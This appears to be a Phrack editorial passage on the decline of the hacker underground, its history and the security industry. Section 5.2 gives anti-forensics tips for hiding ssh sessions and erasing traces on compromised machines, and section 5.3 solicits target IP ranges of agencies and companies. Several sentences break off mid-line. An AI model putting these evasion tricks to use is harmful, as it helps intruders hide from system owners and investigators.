the other side, you have all the "good" guys: cops, DEA, pharmaceutical
groups creating medicines against drugs, president of the USA asking for
more budget to counter drugs... The main speech of all these good guys
is : "we have to eradicate drugs!". Well, why not. Most of us agree.

    But if there is no more drugs in the world, I guess that a big part
of the world economy would fall. Small dealers wouldn't have the money to
buy food, pharmaceutical groups would loose a big part of their business,
DEA and similar agencies wouldn't have any reason to exist. All the
drugs centers could be closed, banks would loose money coming from the
drugs market. If you take all thoses things into consideration, do
you think that governments would want to eradicate drugs? Asking the
question is probably answering it.

    Now lets move on to the security world.

    On the one side you have a lot of companies, conferences,
open source security developers, computer crime units... On the
other side you have hackers, script kiddies, phreackers.... Should
I explain this again or can I directly ask the question? Do you really
think that security companies want to eradicate hackers?

    To show you how these two worlds are similar, lets look at another
example. Sometimes, you hear about the cops arrested a dealer, maybe a
big dealer. Or even an entire cartel. "Yeah, look ! We have arrested a
big dealer ! We are going to eradicate all the drugs in the world!!!". And
sometimes, you see a news like "CCU arrests Mafiaboy, one of the best
hacker in the world". Computer crime units and DEA need publicity - they 
arrest someone and say that this guy is a terrorist. That's the best way 
to ask for more money. But they will rarely arrest one of the best hackers 
in the world. Two reasons. First, they don't have the intention (and if 
they would, it's probably to hire him rather than arrest him). Secondly, 
most of the Computer Crime Units don't have the knowledge required.

    This is really a shame, nobody is honest. Our governments claim that
they want to eradicate hackers and drugs, but they know if there were
no more hackers or drugs a big part of the world economy could fall. It's
again exactly the same thing with wars. All our presidents claim that we
need peace in the world, again most of us agree. But if there are no more
wars, companies like Lockheed Martin, Raytheon, Halliburton, EADS, SAIC...
will loose a huge part of their markets and so banks wouldn't have
the money generated by the wars.

    The paradox relies in the perpetual assumption that threat is
generated from abuses where in fact it might comes from inproper 
technological design or money driven technological improvement where the 
last element shadows the first. And when someone that is dedicated enough 
digs it, we have a snowball effect, thus every fish in the pound at one 
time or an other become a part of it.

   And as you can see, this paradox is not exclusive to the security
industry/underground or even the computer world, it could be considered
as the gold idol paradox but we do not want to get there.

    In conclusion, the security world need a reason to justify its
business. This reason is the presence of hackers or a threat (whatever 
hacker means), the presence of an hackers scene and in more general terms 
the presence of the Underground.

    We don't need them to exist, we exist because we like learning,
learning what we are not supposed to learn. But they give us another good
reason to exist. So if we are "forced" to exist, we should exist in
the good way. We should be well organized with a spirit that reflect our
philosophy. Unfortunately, this spirit which used to characterized us is 
long gone...

--[ 3. Past and Present Underground scene

    The "scene", this is a beautiful word. I am currently in a country
very far away from all of your countries, but it is still an
industrialized country. After spending some months in this country, I found
some old-school hackers. When I asked them how the scene was in their 
country, they always answered the same thing: "like everywhere, dying". It's 
a shame, really a shame. The security world is getting larger and larger and 
the Underground scene is dying.

    I am not an old school hacker. I don't have the pretension to claim
it I would rather say that I have some old-school tricks or maybe that my
mind is old-school oriented, but that's all. I started to enjoy the
hacking life more or less 10 years ago. And the scene was already dying.

    When I started hacking, like a lot of people, I have read all the past
issues of Phrack. And I really enjoyed the experience. Nowadays,
I'm pretty sure that new hackers don't read old Phrack articles anymore. 
Because they are lazy, because they can find information elsewhere, 
because they think old Phracks are outdated... But reading old Phracks is 
not only to acquire knowledge, it's also to acquire the hacking spirit.

----[ 3.1 A lack of culture and respect for ancient hackers

    How many new hackers know the hackers history? A simple example is 
Securityfocus. I'm sure a lot of you consult its vulnerabilities
database or some mailing list. Maybe some of you know Kevin Poulsen who
worked for Securityfocus for some years and now for Wired. But how many of
you know his history? How many knew that at the beginning of the 80's he
was arrested for the first time for breaking into ARPANET? And that he
was arrested a lot more times after that as well. Probably not a lot
(what's ARPANET after all...).

    It's exactly the same kind of story with the most famous hacker in
the world: Kevin Mitnick. This guy really was amazing and I have a
total respect for what he did. I don't want to argue about his present
activity, it's his choice and we have to respect it.  But nowadays,
when new hackers talk about Kevin Mitnick, one of the first things I
hear is : "Kevin is lame. Look, we have defaced his website, we are much
better than him". This is completely stupid. They have probably found a
stupid web bug to deface his website and they probably found the way to
exploit the vulnerability in a book like Hacking Web Exposed. And after
reading this book and defacing Kevin's website, they claim that Kevin
is lame and that they are the best hackers in the world... Where are we
going? If these hackers could do a third of what Kevin did, they would
be considered heroes in the Underground community.

    Another part of the hacking culture is what some people name "The
Great Hackers War" or simply "Hackers War". It happened 15 years ago
between probably the two most famous (best?) hackers group which had
ever existed: The Legion of Doom and Master of Deception. Despite that
this chapter of the hacking history is amazing (google it), what I
wonder is how many hackers from the new generation know that famous
hackers like Erik Bloodaxe or The Mentor were part of these groups.
Probably not a lot. These groups were mainly composed of skilled and
talented hackers/phreackers. And they were our predecessor. You can still
find their profiles in past issues of Phrack. It's still a nice read.

    Let's go for another example. Who knows Craig Neidorf? Nobody? Maybe
Knight Lightning sounds more familiar for you... He was the first editor
in chief of Phrack with Taran King, Taran King who called him his
"right hand man". With Taran King and him, we had a lot of good articles,
spirit oriented. So spirit oriented that one article almost sent him
to jail for disclosing a confidential document from Bell South. 
Fortunately, he didn't go in jail thanks to the Electronic Frontier 
Foundation who preached him. Craig wrote for the first time in Phrack 
issue 1 and for the last time in Phrack issue 40. He is simply the best
contributor that Phrack has ever had, more than 100 contributions. Not 
interesting? This is part of the hacking culture.

    More recently, in the 90's, an excellent "magazine" (it was more a
collection of articles) called F.U.C.K. (Fucked Up College Kids) was
made by a hacker named Jericho... Maybe some new hackers know Jericho for 
his work on (that's not sure...), but have you already taken
time to check Attrition website and consult all the good work that Jericho
and friends do? Did you know that Jericho wrote excellent Phrack World
News under the name Disorder 10 years ago (and trust me his news were 
great) ? Stop thinking that is only an old dead mirror of 
web site defacements, it's much more and it's spirit oriented.

    Go ask Stephen Hawking if knowing the scientific story is not
important to understand the scientific way/spirit... Do you think that 
Stephen doesn't know the story of Aristotle, Galileo, Newton or Einstein ?

    To help wannabe hackers, I suggest that they read "The Complete
History of Hacking" or "A History of Computer Hacking" which are very 
interesting for a first dive in the hacking history and that can easily be 
found with your favorite search engine.

    Another good reading is the interview of Erik Bloodaxe in 1994
where Erik said something really interesting about Phrack:

"I, being so ridiculously nostalgic and sentimental, didn't want to see
it (phrack) just stop, even though a lot of people always complain about
the content and say, "Oh, Phrack is lame and this issue didn't have enough
info, or Phrack was great this month, but it really sucked last month."
You know, that type of thing. Even though some people didn't always
agree with it and some people had different viewpoints on it, I really
thought someone needed to continue it and so I kind of volunteered for

    It's still true...

----[ 3.2 A brief history of Phrack

    Let's go for a short hacking history course and let's take a look at
old Phracks where people talked about the scene and what hacking is.

Phrack 41, article 1:

"The type of public service that I think hackers provide is not showing
security holes to whomever has denied their existence, but to merely
embarrass the hell out of those so-called computer security experts
and other purveyors of snake oil."

    This is true, completely true. This is closely related to what I said
before. If there are no hackers, there are no security experts. They
need us. And we need them. (We are family)

Phrack 48, article 2:

    At the end of this article, there is the last editorial of Erik
Bloodaxe. This editorial is excellent, everyone should read it. I will
just reproduce some parts here:

"... The hacking subculture has become a mockery of its past self.
People might argue that the community has "evolved" or "grown" somehow,
but that is utter crap.  The community has degenerated.  It has become a
media-fueled farce.  The act of intellectual discovery that hacking once
represented has now been replaced by one of greed, self-aggrandization
and misplaced post-adolescent angst... If I were to judge the health of
the community by the turnout of this conference, my prognosis would be 
"terminally ill."..."

    And this was in 1996. If we ask to Erik Bloodaxe now what he thinks
about the current scene, I'm pretty sure he would say something
like: "irretrievable" or "the hacking scene has reached a point of no

"...There were hundreds of different types of systems, hundreds
of different networks, and everyone was starting from ground zero.
There were no public means of access; there were no books in stores or
library shelves espousing arcane command syntaxes; there were no classes
available to the layperson. ..."

    Have you ever heard of a "hackademy"? Nowadays, if you want to be a
hacker it's really easy. Just go to a hacker school and they will teach
you some of the more eleet tricks in the world. That's the new hacker way.

"Hacking is not about crime. You don't need to be a criminal to be
a hacker. Hanging out with hackers doesn't make you a hacker any more
than hanging out in a hospital makes you a doctor. Wearing the t-shirt
doesn't increase your intelligence or social standing. Being cool doesn't
mean treating everyone like shit, or pretending that you know more than
everyone around you."

    So what is hacking? My point of view is that hacking is a philosophy,
a philosophy of life that you can apply not only to computers but to
a lot of things. Hacking is learning, learning computers, networks,
cryptology, telephone systems, spying system and agencies, radio, what
our governments hide... Actually all non-conventional subjects or what
could also be called a third eye view of the context.

"There are a bunch of us who have reached the conclusion that the "scene"
is not worth supporting; that the cons are not worth attending; that the
new influx of would-be hackers is not worth mentoring. Maybe a lot of us
have finally grown up."

    Here's my answer to Erik 10 years later: "No Eric, you hadn't finally
grown up, you were right." Erik already sent an SOS 10 years ago and
nobody heard it.

Phrack 50, article 1:

"It seems, in recent months, the mass media has finally caught onto
what we have known all along, computer security _IS_ in fact important.
Barely a week goes by that a new vulnerability of some sort doesn't pop up
on CNN. But the one thing people still don't seem to fathom is that _WE_
are the ones that care about security the most...  We aren't the ones that
the corporations and governments should worry about...	We are not
the enemy."

    No, we are not the enemy. But a lot of people claim that we are and
some people even sell books with titles like "Know your enemy". It's
probably one of the best ways to be hated by a lot of hackers. Don't be
surprised if there are some groups like PHC appearing after that.

Phrack 55, article 1:

    Here I will show you the arrogance of the not-so-far past editor,
answering some comments:

"...Yeah, yeah, Phrack is still active you may say. Well let me tell
you something.	Phrack is not what it used to be. The people who make
Phrack are not Knight Lightning and Taran King, from those old BBS
days. They are people like you and me, not very different, that took
on themselves a job that it is obvious that is too big for them. Too
big? hell, HUGE. Phrack is not what it used to be anymore. Just try
reading, let's say, Phrack 24, and Phrack 54..."

    And the editor replied (maybe Route):

"bjx of "PURSUiT" trying to justify his `old-school` ezine.  bjx wrote
a riveting piece on "Installing Slackware" article.  Fear and respect
the lower case "i"".

    This is a perfect example of how the Underground scene has grown up in
the last few years. We can interpret editor's answer like "I'm writing
some eleet articles and not you, so I don't have to take into 
consideration your point of view". But it was a really pertinent remark.

Phrack 56, article 1:

    Here is another excellent example to show you the arrogance of the
Underground scene. Again, it's an answer to a comment from someone:

"...IMHO it hasn't improved. Sure, some technical aspects of the
magazine have improved, but it's mostly a dry technical journal these
days.  The personality that used to characterize Phrack is pretty much
non-existant, and the editorial style has shifted towards one of `I know
more about buffer overflows than you` arrogance. Take a look at the Phrack
Loopback responses during the first 10 years to the recent ones. A much
higher percentage of responses are along the lines of `you're an idiot,
we at Phrack Staff are much smarter than you.`..."

    And the reply:

" - Trepidity <> apparently still bitter at
not being chosen as Mrs. Phrack 2000."

    IMHO, Trepidity's remark was probably the best remark for a long long

    Let's stop this little history course. I have showed you that I'm
not alone in my reflection and that there is something wrong with the
current disfunctional scene. Some people already thought this 10 years ago
and I know that a lot of people are currently thinking exactly the same
thing. The scene is dying and its spirit is flying away.

    I'm not Erik Bloodaxe, I'm not Voyager or even Taran King ... I'm
just me. But I would like to do something like 15 years ago, when the
word hacking was still used in the noble sense. When the spirit was still
there. We all need to react together or the beast will eat whats left
of the spirit.

----[ 3.3 The current zombie scene

    "A dead scene whose body has been re-animated but whose the spirit
is lacking".

    I'm not really aware of every 'groups' in the world. Some people are
much more connected than me. And to be honest, I knew the scene better 5
years ago than I do now. But I will try to give you a snapshot of what
the current scene is. Forgive me in advance for the groups that I will
forget, it's really difficult to have an accurate snapshot. The best way
to have a snapshot of the current scene is probably to use an algorithm
like HITS which allow to detect a web community. But unfortunately I don't
have time to implement it.

    So the current scene for me is like a pyramid and it's organized
like secret societies. I would like to split hackers groups in 3
categories. In order to not give stupid names to these groups I will call 
them layer 1 group, layer 2 group and layer 3 group. In the layer 1, 5 
years ago, you had some really "famous" groups which were, I think, 
composed of talented people. I will split this layer into two categories: 
front-end groups and back-end groups. Some of the groups I called 
front-end are: TESO, THC, w00w00, Phenoelit or Hert. Back-end groups 
include ADM, Synergy, ElectronicSouls or Devhell. And you also have PHC 
that you can include in both categories (you know guys you have your 
entry in Wikipedia!). And at the top of that (but mainly at the top of 
PHC) you had obscure/eleet groups like AB.

   In the layer 2, I would like to include a lot of groups of less
scale but I think which are trying to do good stuff. Generally, these 
groups have no communication with layer 1 groups. These groups are: Toxyn,, Netric, Felinemenace, S0ftpj (nice mag), Nettwerked 
(congratulation for the skulls image guys!), Moloch, PacketWars, 
Eleventh Alliance, Progenic, HackCanada, Blacksecurity, Blackclowns or 
Aestetix. You can still split these groups into two categories, front-end 
and back-end. Back-end are Toxyn or, others probably front-end.

    Beside these groups, you have a lot of wannabe groups that I'd like to
include in layer 3, composed of new generation of hackers. Some of these
groups are probably good and I'm sure that some have the good hacking
spirit, but generally these groups are composed of hackers who learned 
hacking in a school or by reading hackers magazine that they find in 
library. When you see a hacker arrested in a media, he generally comes 
from one of these unknown groups. 20 years ago, cops arrested hackers 
like Kevin Mitnick (The Condor), Nahshon Even-Chaim (Phoenix, The Realm), 
Mark Abene (Phiber Optik, Legion of Doom) or John Lee (Corrupt, Master 
of Deception), now they arrest Mafia Boy for a DDOS...

    There are also some (dead) old school groups like cDc, Lopht or
rhino9, independent skilled guys like Michal Zalewski or Silvio Cesare, 
research groups like Lsd-pl and Darklab and obscure people like GOBBLES, 
N3td3v or Fluffy Bunny :-) And of course, I don't forget people who are 
not affiliated to any groups.

    You can also find some central resources for hackers or phreackers
like Packetstorm or, and magazine oriented resources like
Pull the Plug or Uninformed.

    In this wonderful world, you can find some self proclaimed eleet
mailing list like ODD.

    We can represent all these groups in a pyramid. Of course, this
pyramid is not perfect. So don't blame me if you think that your groups
is not in the good category, it's just a try.

		       The Underground Pyramid
				/ \
			       /   \
			      /     \
			     /	     \
			    /	      \     <-- More eleet hackers in
			   /   \   /   \	the world. Are you in?
			  /    -(o)-	\
			 /     /   \	 \
			/		  \
		       /		   \
		     /			     \	<-- skilled hackers
		    /	AB, Fluffy Bunny, ... \     hacking mainly 
		   /___________________________\    for fun
		  /	|	|	  |	\
		 / PHC	| TESO	| ADM	  | cDc  \  <-- Generally
		/  EL8	| THC	| Synergy | Lopht \	excellent skills 
	       / GOBBLES| WOOWOO| Devhell | rhino9 \	some groups have
	      /    ...	| ...	| ...	  | ....    \	the good spirit
	    /			|		      \
	   /	|     HackCanada       \  <-- good skills,
	  /	 Toxyn		|     Felinemenace	\     some are
	 /	 ...    	|     Netric		 \    very
	/	 		|     ...		  \   original
      /							    \
     /			  WANABEE GROUPS		     \ <-- newbies
   /							       \ <-- info
  / Resources: 2600,Phrack, PacketStorm,, Uniformed, \    for
 /				PTP, ...			 \   all

    All of these people make up the current scene. It's a big mixture
between white/gray/black hats, where some people are white hat in the day
and black hat at night (and vice-versa). Sometimes there are communication
between them, sometimes not. I also have to say that it's generally the
people from layer 1 groups who give talks to security conferences around
the world...

    It's really a shame that PHC is probably the best ambassador of the
hacking spirit. Their initiative was great and really interesting.
Moreover they are quite funny. But IMHO, they are probably a little too
arrogant to be considered like an old spirit group.

    Actually, the bad thing is that all these people are more or less
separate and everyone is fighting everyone else. You can even find some
hackers hacking other hackers! Where is the scene going? Even if you are
technically very good, do you have to say to everyone that you are
the best one and naming others as lamerz? The new hacker generation 
will never understand the hacking spirit with this mentality.

    Moreover the majority of hackers are completely disinterested by
alternate interesting subjects addressed for example in 2600 magazine or 
on Cryptome website. And this is really a shame because these two media 
are publishing some really good information. Most hackers are only 
interested by pure hacking techniques like backdooring, network 
exploitation, client vulnerabilities... But for me hacking is closely 
related to other subjects like those addressed on Cryptome website. For 
example the majority of hackers don't know what SIPRnet is. There is only 
one reference in Phrack, but there are several articles about SIPRnet in 
2600 magazine or on Cryptome website. When I want to discuss about all 
these interesting subjects it's really difficult to find someone in the 
scene. And to be honest the only people that I can find are people away 
from the scene. The majority of hackers composing the groups I mentioned 
above are not interested by these subjects (as far as I know). Old school 
hackers in 80's or 90's were more interested by alternated subjects than 
the new generation.

    In conclusion, firstly we have to get back the old school hacking
spirit and afterwards explain to the new generation of hackers what it is.

    It's the only way to survive. The scene is dying but I won't say
that we can't do anything. We can do something. We must do something.
It's our responsibility.

--[ 4 Are security experts better than hackers?

    STOP!!!!! I do not want to say that security experts are better than
hackers. I don't think they are, but to be honest it's not really
important. It's nonsense to ask who is better. The best guy, independent
from the techniques he used, is always the most ingenious. But there
are two points that I would like to develop.

----[ 4.1 The beautiful world of corporate security

    I met a really old school hacker some months ago, he told me something
very pertinent and I think he was right. He told me that the technology
has really changed these last years but that the old school tricks still
work. Simply because the people working for security companies don't
really care about security. They care more about finding a new eleet
technique to attack or defend a system and presenting it to a security
conference than to use it in practice.

    So Underground, we have a problem. A major problem. 15 years ago,
there were a lot of people working for the security industry. At times,
there also were a lot of people working in what I will call the
Underground scene. No-one can estimate the percentage in each camp, but
I would say it was something like 60% working in security and 40% working
in the Underground scene. It was still a good distribution. Nowadays, I'm
not sure it's still true. A better estimation should be 80/20 orientated
to security or maybe even worse... There are increasingly more and more
people working for the security world than for the Underground scene. Look
at all these "eleet" security companies like ISS, Core Security, Immunity,
IDefense, eEye, @stake, NGSSoftware, Checkpoint (!), Counterpane, Sabre
Security, Net-Square, Determina, SourceFire...I will stop here otherwise
Google will make some publicity for these companies. All these security
companies have hired and still hire some hackers, even if they will say
that they don't. Sometimes, they don't even know they hired a hacker. How
many past Phrack writers work for these companies? My guess is a lot,
really a lot. After all, you can't stop a hacker if you have never been

    You'll tell me: "that's normal, everyone has to eat". Yeah, that's
true. Everyone has to eat. I'm not talking about that. What I don't like
(even if we do need these good and bad guys) is all the stuff around the
security world: conferences, (false) alerts, magazines, mailing lists,
pseudo security companies, pseudo security websites, pseudo security

    Can you tell me why there is so much security related stuff and not
so much Underground related stuff?

--[ 4.2 The in-depth knowledge of security conferences

    If you have a look at all the topics addressed in a security
conference, it's amazing. Take the most famous conferences: *Blackhat, 
*SecWest or even Defcon (I mention only marketing conferences, there are
others good conferences that are less corporate/business oriented like
CCC, PH neutral, HOPE or WTH).  Now look at the talks given by the 
speakers, they're really good. When I went to a security conference 5 
years ago it was so funny, I was saying to my friends: "these guys are 
5 years late". It was true then but I think it's not true anymore. They 
are probably still late, but not as late as they were. But the most 
relevant point for me is that recently there have been a lot of very 
interesting subjects. OK not everything was interesting - there were 
some shit subjects too. What I would consider as interesting subjects 
are those related to new technologies (VOIP, WEB 2.0, RFID, BlackBerry, 
GPS...) or original topics like hardware hacking, BlackOps, agency 
relationships, SE story, bioinfo attack, nanotech, PsyOp... What the 
Fuck ?!#@?! 10 years ago, all the original topics were released in an 
Underground magazine like Phrack or 2600. Not in a security conference 
where you have to pay more than $1000.

    This is not my idea of what hacking should be. Do you really need
publicity like this to feel good? This is not hacking. I'm not talking
here about the core but the form. When I'm coding something at home all
night and in the morning it works, it's really exciting. And I don't
have to say to everyone "look at what I did!". Especially not in public
where people have to pay more than $1000 to hear you.

    Another incredible thing about these security conferences is what I
would call the "conference circuit". Nowadays, if you are a security
expert, the trend is to give the same talk at different security 
conferences around the world. More than 50% of all security experts are 
doing this. They go in America at BlackHat, Defcon and CanSecWest, after 
they move in Europe and they finish in Asia or Australia. They can even 
do BlackHat America, BlackHat Europe and BlackHat Asia! Like Roger
Federer or Tiger Woods, they try to do the Grand Slam! So you can find 
a conference given in 2007 which is more or less the same than one in 
2005. Thus it seems we have now a new profession in our wonderful 
security world: "conferences runner" !

    Last funny thing is the number of conferences that I will include in
the category "How to hack the system XXX". For example at the last
Blackhat USA there was a conference on how to hack an embedded device, 
for example printers and copiers. Despite the fact that it's interesting 
(collecting document printed), what I find funny is the fact that you 
just have to hack a non conventional device to be at Blackat or Defcon. 
So, I will give some good advice to hackers who want to become famous: 
try to hack the coffee machine used by the FBI or the embedded device 
used by the lift of the Pentagon and everyone will see you as a hero 
or a terrorist (thats context based).

--[ 5. Phrack and the axis of counter-attack

    Now that I have given you an overview of the security world, let's
try to see how we can change it. There are two possibilities here. The
first one is this:- I say to you "OK now that you really understand the
problem, it's definitely time to change our mentality. This is the new
mind set that we have to adopt". It's a little bit pretentious to say
this though. Nobody can solve the problem alone and pretend to bring the
good solution. So I guess that the first possibility won't work. People
will agree but nobody will do anything.

    The second possibility is to start with Phrack. All the people who
make up The Circle of Lost Hackers agree that Phrack should come back to
its past style when the spirit was present. We really agree with the quote
above which said that Phrack is mainly a dry technical journal. It's
why we would like to give you some idea that can bring back to Phrack its
bygone aura. Phrack doesn't belong to a group a people, Phrack belongs to
everyone, everyone in the Underground scene who want to bring something
for the Underground. After all, Phrack is a magazine made by the community
for the community.

    We would like to invite everyone to give their point of view about the
current scene and the orientation that Phrack should take in the future.
We could compile a future article with all your ideas.

----[ 5.1. Old idea, good idea

    If you take a look at the old Phrack, there are some recurring
articles :

* Phrack LoopBack
* Line noise
* Phrack World News
* Phrack Prophiles
* International scenes

    Here's something funny about Phrack World News, if you take a look
at Phrack 36 it was not called "Phrack World News" but instead it was
"Elite World News"...

    So, all these articles were and are interesting. But in these
articles, we would like to resuscitate the last one: "International 
scenes". A first essay is made in this issue, but we would like people 
to send us a short description of their scene. It could be very 
interesting to have some descriptions of scenes that are not common, 
for example the China scene, the Brazilian scene, the Russian scene, 
the African scene, the Middle East scene... But of course we are also 
interested in the more classic scenes like Americas, GB, France, Germany, 
... Everything is welcome, but hackers all over the world are not only 
hackers in Europe-Americas, we're everywhere. And when we talk about the 
Underground scene, it should include all local scenes.

----[ 5.2. Improving your hacking skills

    Here we would like to start a new kind of article. An article whose
purpose is to give to the new generation of hackers some different little
tricks to hack "like an eleet". This article will be present in every
new issue (at least until it's dead ... we hope not soon). The idea is
to ask to everyone to send us their tricks when they hack something
(it could be a computer or not). The tricks should be explained in no
more than 30 lines, and it could even be one line. It could be an eleet
trick or something really simple but useful. Example:

An almost invisible ssh connection

    In the worse case if you have to ssh on a box, do it every time
with no tty allocation

    ssh -T user@host

    If you connect to a host with this way, a command like "w" will not
show your connection. Better, add 'bash -i' at the end of the command to
simulate a shell

     ssh -T user@host /bin/bash -i

    Another trick with ssh is to use the -o option which allow you to
specify a particular know_hosts file (by default it's ~/.ssh/know_hosts).
The trick is to use -o with /dev/null:

    ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

    With this trick the IP of the box you connect to won't be logged in

    Using an alias is a good idea.

Erasing a file

    In the case of you have to erase a file on a owned computer, try
to use a tool like shred which is available on most of Linux.

shred -n 31337 -z -u file_to_delete

-n 31337 : overwrite 313337 times the content of the file
-z : add a final overwrite with zeros to hide shredding
-u : truncate and remove file after overwriting

    A better idea is to do a small partition in RAM with tmpfs or
ramdisk and storing all your files inside.

    Again, using an alias is a good idea.

The quick way to copy a file

    If you have to copy a file on a remote host, don't bore yourself with
an FTP connection or similar. Do a simple copy and paste in your Xconsole.
If the file is a binary, uuencode the file before transferring it.

    A more eleet way is to use the program 'screen' which allows copying a
file from one screen to another:

    To start/stop :  C-a H or C-a : log

    And when it's logging, just do a cat on the file you want to transfer.

Changing your shell

    The first thing you should do when you are on an owned computer is to
change the shell. Generally, systems are configured to keep a history for
only one shell (say bash), if you change the shell (say ksh), you won't be

    This will prevent you being logged in case you forget to clean
the logs. Also, don't forget 'unset HISTFILE' which is often useful.

    Some of these tricks are really stupid and for sure all old school
hackers know them (or don't use them because they have more eleet tricks).
But they are still useful in many cases and it should be interesting to
compare everyone's tricks.

----[ 5.3. The Underground yellow pages

    Another interesting idea is to maintain a list of all the interesting
IP ranges in the world. This article will be called "Meaningful IP
ranges". We have already started to scan all the class A and B networks. 
What is really interesting is all the IP addresses of agencies which are 
supposed to spy us. Have a look at this site:

    However we don't have to focus our list on agencies, but on everything
which is supposed to be the power of the world.

It includes:

* All agencies of a country (China, Russia, UK, France, Israel...)

* All companies in a domain, for example all companies related to private
  secret service or competitive intelligence or financial clearing or
  private army (dyncorp, CACI, MPRI, Vinnel, Wackenhut, ...)

* Companies close to government (SAIC, Dassault, QinetiQ, Halliburton,

* Spying business companies (AT&T, Verizon, VeriSign, AmDocs, BellSouth,
  Top Layer Networks, Narus, Raytheon, Verint, Comverse, SS8, pen-link...)

* Spoken Medias (Al Jazeera, Al Arabia, CNN, FOX, BBC, ABC, RTVi, ...)

* Written Medias or press agencies (NY/LA Times, Washington Post,
  Guardian, Le monde, El Pais, The Bild, The Herald, Reuters, AFP, AP, 
  TASS, UPI...)

* All satellite maintainers (Intelsat, Eurosat, Inmarsat, Eutelsat,

* Suspect investment firms (Carlyle, In-Q-Tel...)

* Advanced research centers (DARPA, ARDA/DTO, HAARP...)

* Secret societies, fake groups and think-tanks (The Club of Rome, The
  Club of Berne, Bilderberg, JASON group, Rachel foundation, CFR, ERT,
  UNICE, AIPAC, The Bohemian Club, Opus Dei, The Chatman House, Church of

* Guerilla groups, rebels or simply alternative groups (FARC, ELN, ETA,
  KKK, NPA, IRA, Hamas, Hezbolah, Muslim Brothers...)

* Ministries (Defense, Energy, State, Justice...)

* Militaries or international polices (US Army, US Navy, US Air Force,
  NATO, European armies, Interpol, Europol, CCU...)

* And last but not least: HONEYPOT!

    It's obvious that not all ranges can be obtained. Some agencies are
registered under a false name in order to be more discrete (what about
ENISA, the European NSA?), others use some high level systems (VPN, tor
...) on top of normal networks or simply use communication systems other
than the Internet. But we would like to keep the most complete list we
can. But for this we need your help. We need the help of everyone in
the Underground who is ready to share knowledge. Send us your range.

    We started to scan the A and B range with a little script we made,
but be sure that the more interesting range are in class C. Here is a
quick start of the list : - : DoD Network Information Center - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Defense Intelligence Agency - : Central Intelligence Agency - : Central Intelligence Agency - : The Pentagon - : The Pentagon - : The Pentagon - : The Pentagon - : The Pentagon - : Army Information Systems Command-Pentagon - : DoD Network Information Center - : U.S. Army Research Laboratory - : U.S. Army Research Laboratory - : United States Army Corps of Engineers - : U.S. Army Research Laboratory - : DoD Network Information Center - : DoD Network Information Center - : U.S. ARMY Tank-Automotive Command - : DoD Network Information Center - : DoD Network Information Center - : Headquarters, USAAISC - : U.S. Army Research Laboratory - : DoD Network Information Center - : DARPA ISTO - : Defense Advanced Research Projects Agency - : POLFIN ( Ministry of Finance Poland) - : Ministry of Education Computer Center Taiwan - : Kuwait Ministry of Communications - : Ministry of Interior Hungary - : United States Army Space and Strategic
Defense - : United States Cellular Telephone - : NATO Headquarters - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : NASA - : FBI Criminal Justice Information Systems - : Navy Regional Data Automation Center - : Navy Regional Data Automation Center - : Navy Regional Data Automation Center - : France Telecom R&D - : France Telecom R&D - : France Telecom R&D - : Alcanet International (Alcatel) - : Credit Agricole - : Credit Agricole - : Credit Agricole - : Bank of America - : Bank of America - : The Chase Manhattan Bank - : Banque Nationale de Paris - : Swiss Federal Military Dept. - : navy aviation supply office - : Commanding Officer Navy Ships Parts - : Navy Personnel Research - : Secretary of the Navy - : Halliburton Company - : Science Applications International

    The last one is definitely interesting; people interested by obscure
technologies should investigate in-depth SAIC stuff...

    But anyway this list is rough and incomplete. We have a lot more
interesting ranges but not yet classed. It's just to show you how easy
it is to obtain.

    If you think that the idea is funny, send us your range. We would be
pleased to include your range in our list. The idea is to offer the more
complete list we can for the next Phrack release.

----[ 5.4. The axis of knowledge

    I'm sure that everyone knows "the axis of evil". This sensational
expression was coined some years ago by Mr. Bush to group wicked
countries (but was it really invented by the "president" or by m1st3r
Karl Rove??). We could use the same expression to name the evil subjects
that we would like to have in Phrack. But I will leave to Mr Powerful
Bush his expression and find a more noble one : The Axis of Knowledge.

    So what is it about? Just list some topics that we would like to find
more often in Phrack. In the past years, Phrack was mainly focused on
exploitation, shellcode, kernel and reverse engineering. I'm not saying
that this was not interesting, I'm saying that we need to diversify the
articles of Phrack. Everyone agrees that we must know the advances in
heap exploitation but we should also know how to exploit new technologies.

------[ 5.4.1 New Technologies

    To illustrate my point, we can take a quote from Phrack 62, the
profiling of Scut:

Q: What suggestions do you have for Phrack?

A:  For the article topics, I personally would like to see more articles
on upcoming technologies to exploit, such as SOAP, web services,
.NET, etc.

    We think he was right. We need more article on upcoming technology.
Hackers have to stay up to date. Low level hacking is interesting but we
also need to adapt ourselves to new technologies.

    It could include: RFID, Web2, GPS, Galileo, GSM, UMTS, Grid Computing,
Smartdust system.

    Also, since the name Phrack is a combination between Phreack and Hack,
having more articles related to Phreacking would be great. If you have
a look to all the Phrack issues from 1 to 30, the majority of articles 
talked about Phreacking. And Phreacking and new technologies are closely 

------[ 5.4.2 Hidden and private networks

    We would like to have a detailed or at least an introduction to
private networks used by governments. It includes:

* Cyber Security Knowledge Transfer Network (KTN)

* Unclassified but Sensitive Internet Protocol Router Network
  The Secret IP Router Network (SIPRN)


* Advanced Technology Demonstration Network

* Global Information Grid (GIG)

    There are a lot private networks in the world and some are not
documented. What we want to know is: how they are implemented, who
is using them, which protocols are being used (is it ATM, SONET...?),
is there a way to access them through the Internet, ....

    If you have any information to share on these networks, we would be
very interested to hear from you.

------[ 5.4.3 Information warfare

    Information warfare is probably one of the most interesting upcoming
subjects in recent years. Information is present everywhere and the one
who controls the information will be the master. USA already understands
this well, China too, but some countries are still late. Especially in
Europe. Some websites are already specialized in information warfare
like IWS the Information Warfare Site (

    You can also find some schools across the world which are specialized
in information warfare.

    We, hackers, can use our knowledge and ingeniousness to do something
in this domain. Let me give you two examples. The first one is Black Hat
SEO ( This subject is really interesting
because it combines a lot of subjects like development, hacking,
social engineering, linguistics, artificial intelligence and even
marketing. These techniques can be use in Information Warfare and we
would like the Underground to know more about this subject.

    Second example, in a document entitled "Who is n3td3v?" the author
(hacker factor) use linguistic techniques in order to identify
n3td3v. After having analyzed n3td3v's text, the author claims that 
n3td3v and Gobbles are probably the same person. N3td3v's answer was 
to say that he has an A.I. program allowing him to generate a text 
automatically. If he wants to sound like George Bush, he has simply 
to find a lots of articles by him, give these texts to his A.I. and 
the AI program will build a model representing the way that George 
